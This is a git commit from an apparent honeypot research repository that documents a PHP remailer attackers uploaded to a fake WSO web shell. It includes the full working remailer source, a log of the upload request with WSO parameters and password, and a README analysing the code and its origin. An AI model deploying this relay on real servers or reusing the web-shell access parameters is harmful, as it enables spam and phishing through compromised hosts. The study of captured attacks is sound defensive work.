sandsmark98.php small remailer

bediger4000 · bediger4000 · commit 473aa25c7132 · 2019-11-12T21:01:47.000-07:00
diff --git a/README.md b/README.md
@@ -375,6 +375,10 @@ in various email black lists.
 
 Simple, reasonably carefully coded remailer.
 
+## [Simple Remailer](remailers/5.8.54.6-2019-10-08a)
+
+Another small, carefully coded remailer.
+
 ## [htaccess.php - web shell](webshells/WSO-htaccess.php)
 
 WSO "Web Shell by oRb", downloaded by a previously-installed
diff --git a/remailers/5.8.54.6-2019-10-08a/5.8.54.6XZymjDdQFFS6X-T8Xw5ligAAAAE.0.file b/remailers/5.8.54.6-2019-10-08a/5.8.54.6XZymjDdQFFS6X-T8Xw5ligAAAAE.0.file
@@ -0,0 +1,103 @@
+<?php
+    /**
+    */
+    function EmailText($from, $to, $subj, $text, $replyto, $fname, $headers, $file, $filename)
+    {
+        $uniq   = strtoupper(uniqid(time()));
+        $subj   = '=?UTF-8?B?'.base64_encode($subj).'?=';
+        
+        $head   = "From: =?utf-8?B?".base64_encode(trim($fname))."?= <".trim($from).">\n";
+        $head   .= "Subject: ".$subj."\n";
+        $head   .= "Reply-To: ".$replyto."\n";
+        $head   .= "Return-Path: ".$replyto."\n";
+        
+        //$head   .= "X-Mailer: PHP/" . phpversion()."\n";
+        
+        foreach ($headers as $header)
+        {
+            $head .= $header."\n";
+        }
+        $head     .= "Mime-Version: 1.0\n";
+        $head     .= "Content-Type:multipart/mixed;";
+        $head     .= "boundary=\"----------".$uniq."\"\n\n";
+        
+        $body   = "------------".$uniq."\nContent-Type: text/plain; charset=utf-8\n";
+        $body   .= "Content-Transfer-Encoding: 8bit\n\n".$text."\n\n";
+        
+        $file = trim($file);
+        if (strlen($file) > 0)
+        {
+            $body   .= "------------".$uniq."\n";
+            $body   .= "Content-Type: application/octet-stream;";
+            $body   .= "name=\"".$filename."\"\n";
+            $body   .= "Content-Transfer-Encoding: base64\n";
+            $body   .= "Content-Disposition: attachment;";
+            $body   .= "filename=\"".$filename."\"\n\n";
+            $body   .= chunk_split(base64_encode($file))."\n";
+            $body   .= "------------".$uniq."\n";
+        }
+        return mail("$to", "$subj", $body, $head);
+    }
+    
+    /**
+    */
+    function EmailHtml($from, $to, $subj, $text, $replyto, $fname, $headers, $file, $filename)
+    {
+        $uniq   = strtoupper(uniqid(time()));
+        $subj   = '=?UTF-8?B?'.base64_encode($subj).'?=';
+        
+        $head   = "From: =?utf-8?B?".base64_encode(trim($fname))."?= <".trim($from).">\n";
+        $head   .= "Subject: ".$subj."\n";
+        $head   .= "Reply-To: ".$replyto."\n";
+        $head   .= "Return-Path: ".$replyto."\n";
+        
+        foreach ($headers as $header)
+        {
+            $head .= $header."\n";
+        }
+        $head     .= "Mime-Version: 1.0\n";
+        
+        $head     .= "Content-Type:multipart/mixed;";
+        $head     .= "boundary=\"----------".$uniq."\"\n\n";
+        $body   = "------------".$uniq."\nContent-Type: text/html; charset=utf-8;\n";
+        $body   .= "Content-Transfer-Encoding: 8bit\n\n".mb_convert_encoding($text, "HTML-ENTITIES", "UTF-8")."\n\n";
+        
+        $file = trim($file);
+        if (strlen($file) > 0)
+        {
+            $body   .= "------------".$uniq."\n";
+            $body   .= "Content-Type: application/octet-stream;";
+            $body   .= "name=\"".$filename."\"\n";
+            $body   .= "Content-Transfer-Encoding: base64\n";
+            $body   .= "Content-Disposition: attachment;";
+            $body   .= "filename=\"".$filename."\"\n\n";
+            $body   .= chunk_split(base64_encode($file))."\n";
+            $body   .= "------------".$uniq."\n";
+        }
+        return mail("$to", "$subj", $body, $head);
+    }
+        
+    @$filename  = trim($_POST['filename']);
+    @$file      = trim($_POST['file']);
+    @$email     = trim($_POST['email']);
+    @$type      = trim($_POST['type']);
+    @$subj      = trim($_POST['subj']);
+    @$fname     = trim($_POST['fname']);
+    @$replyto   = trim($_POST['replyto']);
+    @$from      = trim($_POST['from']);
+    @$text      = trim($_POST['text']);
+    @$headers   = json_decode(trim($_POST['headers']));
+    
+    if (preg_match("~txt~is", $type))
+    {
+        $text = strip_tags($text);
+        $ok = EmailText($from, $email, $subj, $text, $replyto, $fname, $headers, $file, $filename);
+        print $ok ? 'OK' : 'FAIL';
+    }
+    
+    if (preg_match("~html~is", $type))
+    {
+        $ok = EmailHtml($from, $email, $subj, $text, $replyto, $fname, $headers, $file, $filename);
+        print $ok ? 'OK' : 'FAIL';
+    }
+?>
diff --git a/remailers/5.8.54.6-2019-10-08a/5.8.54.6XZymjDdQFFS6X-T8Xw5ligAAAAE.wso.scans b/remailers/5.8.54.6-2019-10-08a/5.8.54.6XZymjDdQFFS6X-T8Xw5ligAAAAE.wso.scans
@@ -0,0 +1,76 @@
+
+_SERVER
+Array
+(
+    [UNIQUE_ID] => XZymjDdQFFS6X-T8Xw5ligAAAAE
+    [SCRIPT_URL] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [SCRIPT_URI] => http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [HTTP_HOST] => stratigery.com
+    [HTTP_USER_AGENT] => Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1)
+    [HTTP_ACCEPT] => image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
+    [CONTENT_TYPE] => multipart/form-data; boundary=Snoopy365c91fd3243c094d9cb006cbee16c80
+    [CONTENT_LENGTH] => 4748
+    [PATH] => /usr/local/sbin:/usr/local/bin:/usr/bin
+    [SERVER_SIGNATURE] => 
+    [SERVER_SOFTWARE] => Apache/2.4.41 (Unix) PHP/7.3.10
+    [SERVER_NAME] => stratigery.com
+    [SERVER_ADDR] => 162.246.45.144
+    [SERVER_PORT] => 80
+    [REMOTE_ADDR] => 5.8.54.6
+    [DOCUMENT_ROOT] => /srv/http/stratigery/htdocs
+    [REQUEST_SCHEME] => http
+    [CONTEXT_PREFIX] => 
+    [CONTEXT_DOCUMENT_ROOT] => /srv/http/stratigery/htdocs
+    [SERVER_ADMIN] => bediger8@gmail.com
+    [SCRIPT_FILENAME] => /srv/http/stratigery/htdocs/fake_wp/wso.php
+    [REMOTE_PORT] => 58584
+    [GATEWAY_INTERFACE] => CGI/1.1
+    [SERVER_PROTOCOL] => HTTP/1.0
+    [REQUEST_METHOD] => POST
+    [QUERY_STRING] => 
+    [REQUEST_URI] => /wordpress//wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [SCRIPT_NAME] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [PHP_SELF] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [REQUEST_TIME_FLOAT] => 1570547340.062
+    [REQUEST_TIME] => 1570547340
+)
+
+_REQUEST
+Array
+(
+    [pass] => nhzgrf
+    [a] => FilesMan
+    [c] => /var/www/html/
+    [p1] => uploadFile
+    [charset] => Windows-1251
+)
+
+_COOKIE
+ Array
+(
+)
+
+_FILES
+ 
+UPLOADED FILE f
+ Array
+(
+    [name] => sandsmark98.php
+    [type] => image/jpeg
+    [tmp_name] => /tmp/phpSaqaP2
+    [error] => 0
+    [size] => 4062
+)
+
+END UPLOADED FILE f
+ Uploaded file: /var/tmp/5.8.54.6XZymjDdQFFS6X-T8Xw5ligAAAAE.0.file
+
+END _FILES
+ $my_blog=http://stratigery.com/wordpress//wp-content/plugins/revslider/temp/update_extract/revslider
+pass parameter, acting as WSO
+Acting as WSO, login cookie.
+a = FilesMan
+c = /var/www/html/
+p1 = uploadFile
+Acting as WSO, receive uploaded file.
+Acting as WSO, send /var/www/html/ listing.
diff --git a/remailers/5.8.54.6-2019-10-08a/README.md b/remailers/5.8.54.6-2019-10-08a/README.md
@@ -0,0 +1,69 @@
+# Well-coded re-mailer
+
+A strangely well-coded email forwarder.
+
+## Origin
+
+The attackers thought they were downloading a file named "sandsmark98.php"
+to an instance of a [WSO web shell](/webshells/wso_in_depth).
+The download request came with all the HTTP parameters used
+by WSO instances, complete with sterotypical values.
+
+|Parameter name|Parameter value|
+|-------------|----------------|
+|pass|nhzgrf |
+|a|FilesMan|
+|c|/var/www/html/|
+|p1|uploadFile|
+|charset|Windows-1251|
+
+"uploadFile" is a sub-task of the "FilesMan" action in WSO.
+The request arrived with a password, "nhzgrf" which is very typical
+of WSO installations.
+
+### IP Address 5.8.54.6
+
+    inetnum:        5.8.48.0 - 5.8.55.255
+    netname:        PIN-DATACENTER-NET
+    country:        RU
+    organisation:   ORG-PINl1-RIPE
+    org-name:       Petersburg Internet Network ltd.
+    org-type:       LIR
+    address:        Babushkina st. 3, office 215.
+    address:        192029
+    address:        Saint-Petersburg
+    address:        RUSSIAN FEDERATION
+    route:          5.8.54.0/24
+    descr:          PIN DC
+    origin:         AS34665
+
+## Obfuscation
+
+The [downloaded file](5.8.54.6XZymjDdQFFS6X-T8Xw5ligAAAAE.0.file)
+isn't obfuscated at all.
+Oddly, virustotal.com found no anti-viruses that could detect it.
+
+## Analysis
+
+There's 103 lines of craftsmanlike code in this remailer.
+The indentation is consistently 4-ASCII-spaces,
+some "blank" lines consist of blocks of 4 ASCII spaces.
+This suggests a careful cut-n-paste of the code.
+Variables are lowercase, names are relevant to the variables' function.
+Two comments do appear, but one is an empty block,
+and the other is a line of code that's apparently no longer wanted.
+
+There are 2 functions, `EmailText` and `EmailHtml` which do duplicate
+a lot of code, each of them setting up elaborate SMTP headers in much the same
+fashion.
+It includes "Content-type" and content encoding headers,
+and the `EmailHtml` function base64-encodes the HTML part of the email.
+Ultimately, the remailer invokes the PHP `mail` builtin to do SMTP
+with whatever SMTP server the compromised host has set up.
+
+The remailer works when invoked by an HTTP POST request,
+and works with plainly-named HTTP parameters.
+The value of the POST parameter named "headers" gets passed through
+the PHP builtin `json_decode`.
+`json_decode` became a builtin with PHP 5.2.0,
+so this code isn't very backward compatible.
